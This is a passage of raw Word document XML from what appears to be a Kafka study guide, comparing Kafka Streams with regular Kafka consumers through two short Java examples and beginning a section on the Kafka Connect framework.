          <w:p w14:paraId="3F04D1DF"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lastRenderedPageBreak/>
              <w:t>Integration with Kafka Topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F43BBE"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Streams is tightly integrated with Kafka and handles both consuming and producing messages within a single framework.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A4B8CC"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Regular Kafka consumers only consume messages from Kafka topics and don’t handle producing data unless explicitly coded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31EBDFA0" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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Example: Kafka Streams Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEC462"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Here’s an example of a Kafka Streams application that reads messages from a Kafka topic, transforms the messages to uppercase, and writes them to another topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0B37A"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mport org.apache.kafka.streams.KafkaStreams;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07221AED"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mport org.apache.kafka.streams.StreamsBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426FB423"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mport org.apache.kafka.streams.kstream.KStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525E8BD7" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10278AE1"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mport java.util.Properties;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5807900F" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352E83BD"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ublic class KafkaStreamsExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480BFE7" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4EDD61"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FB19F"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 Set up the properties for Kafka Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199E035F"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Properties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF4087C"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props.put("application.id", "streams-example");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F666FE"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props.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DA1856" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E44AAC"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 Define the stream processing logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E118180"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StreamsBuilder builder = new StreamsBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A1DD40"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KStream&lt;String, String&gt; inputStream = builder.stream("input-topic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB19A3E" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44772CFE"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 Transform the input stream to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B05D87A"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KStream&lt;String, String&gt; transformedStream = inputStream.mapValues(value -&gt; value.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4E8FBF" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ED5A8B"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 Write the transformed data to another topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B75D43"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transformedStream.to("output-topic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7381BA37" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D1B8F4"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 Build the Kafka Streams topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B154E9"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KafkaStreams streams = new KafkaStreams(builder.build(), props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78135A8A"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streams.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19854F8E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A49B1F6"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683CE6C2"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n this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D89C1" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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e input-topic is consumed by the Kafka Streams application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A6C76" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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e messages are transformed (in this case, converted to uppercase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F98F2" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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e processed messages are then written to output-topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330B70F4"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Streams automatically handles the consumption of messages, transformation, fault tolerance, state management (if required), and producing the results back to Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F90FFD" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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Example: Regular Kafka Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E74476"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Here’s a simple example of a regular Kafka consumer that consumes messages from a Kafka topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A3DC1"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mport org.apache.kafka.clients.consumer.Consumer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795FFB9D"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mport org.apache.kafka.clients.consumer.KafkaConsumer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244A274"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mport org.apache.kafka.common.serialization.StringDeserializer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E19360C" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383B5894"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mport java.util.Collections;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C20705"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mport java.util.Properties;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4994422D" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BB9FBF"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ublic class RegularKafkaConsumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC55B3" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA0A2C6"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29914B3D"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Properties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46003DAC"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props.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124AD983"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props.put("group.id", "test-consumer-group");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C872AE3"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props.put("key.deserializer", StringDeserializer.class.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48853E6D"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props.put("value.deserializer", StringDeserializer.class.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8AE05" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F8C829"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sumer&lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3823BEA3"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sumer.subscribe(Collections.singletonList("input-topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5542B7" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37ED359B"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while (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E4DF5"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sumer.poll(1000).forEach(record -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657170E4"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System.out.println(record.value());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C04C035"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4E81E0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D9594B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68439A3D"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04810A14"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n this regular consumer example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C54AA" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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e consumer reads messages from input-topic and prints them to the console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8EED4" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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t doesn't perform any transformations or advanced stream processing like Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EEF229" w14:textId="77777777" w:rsidR="00C34B0B"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2A0FF85">
          <v:rect id="_x0000_i3176" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD031C" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD1885" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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afka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a high-level library designed for stream processing with features like stateful processing, fault tolerance, scalability, and exactly-once semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA28DDE" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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gular Kafka Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are typically used for basic consumption of messages without the rich features of stream processing, state management, or windowing offered by Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A295889" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0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Streams is ideal for applications where complex, real-time data transformations, aggregations, and windowing are required, while regular consumers are best suited for simpler, message-consumption-based use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A8C232" w14:textId="64508A03"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60551B4">
          <v:rect id="_x0000_i3177" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE9BA2" w14:textId="495A9F18" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00391147" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="794" w:name="_Toc196308274"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Kafka Connect framework, and how does it help in data integration</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="794"/>
    </w:p>
    <w:p w14:paraId="510A5E6C" w14:textId="486F65AE" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 Connect Framework: Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5282F"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afka Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool for </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable and reliable</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> streaming data integration. It is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ecosystem designed to simplify the process of integrating </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with external systems, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>databases</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key-value stores</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search indexes</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file systems</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synchronizing data between Kafka topics and external systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D734979"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Connect simplifies data import and export between </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and external systems, allowing you to focus on business logic instead of dealing with the complexities of system integration and the complexities of low-level Kafka consumers and producers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD67BDA" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED"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ey Components of Kafka Connect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A2C51" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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nectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62FC44" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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ource Connectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These pull data from external systems into Kafka. For example, a database source connector can fetch records from a database and produce them into Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F747233" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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ink Connectors</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These push data from Kafka topics into external systems. For example, a database sink connector can read data from Kafka topics and insert it into a relational database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E02E4" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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Workers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1C21E" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect uses </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>workers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run connectors. Workers can run in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standalone mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where a single worker runs on one machine) or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where multiple workers run across multiple machines in a Kafka cluster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7210B1D7" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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tandalone Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
